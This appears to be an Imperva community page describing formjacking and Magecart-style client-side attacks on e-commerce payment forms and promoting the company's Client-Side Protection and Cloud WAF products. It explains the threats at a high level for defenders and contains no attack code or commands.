Search Imperva Community for
This puts them at risk for client-side cyberattacks. Alarmingly, these attacks can be successful even with industry-standard server protection in place.
The organization itself is not processing any of this data. It sends raw data to a third-party and receives the processed data back. Hackers have begun targeting this communication channel.
Formjacking is among the most dangerous kinds of client-side attacks. If hackers compromise an e-commerce processor’s payment form, then every company using that particular payment service becomes a target. Whenever a customer enters their credit card data onto the payment form, that data is skimmed and sent to the attackers.
If you run an e-commerce website and integrate a payment provider solution, you will probably do the same thing most engineers and developers do: Simply copy and paste the code your vendor gives you.
It’s hard for attackers to compromise code sent between vendors and clients through secure channels. But not all code is sent securely. Open source repositories like GitHub allow anyone to copy and paste code. Some vendors send their clients integration codes through unsecured email.
In these situations, it’s relatively simple for a hacker to use tried-and-true phishing methods to gain access to the code being sent. If a hacker compromises a payment processor’s email account, or finds their way into a code repository that other developers will be copying and pasting from, their changes may easily go unnoticed.
Another common tactic cybercriminals use is scanning for misconfigured Amazon S3 buckets. More than 17,000 domains have been compromised by the Magecart group using this strategy.
Since 2019, we’ve documented an active campaign to automate the process of scanning for these misconfigured buckets. Hackers do not need to manually look for vulnerabilities. Web administrators – even for very small sites – need to review their website code for suspicious artifacts and unauthorized changes.
It’s easy to see the efficiency of this approach. Cybercriminals only need to compromise a single account in order to gain access to thousands of websites. Automation essentially guarantees a financial return.
The first step to adequate protection is examination and approval. Imperva’s Client-Side Protection solution continuously monitors these connections and only allows the execution of pre-approved services.
This way, users can block connections with unapproved destinations. Even compromised code cannot send sensitive data to unknown sources from the client. Watch the webinar: How to protect your website from client-side attacks like Formjacking and Magecart - CSP
Imperva’s Cloud WAF and Client-Side Protection services are complementary. Once you have the Cloud WAF deployed, you can then capitalize on the security benefits that Client-Side Protection offers.
or Contact Us
Copyright @ 2019 Imperva. All rights reserved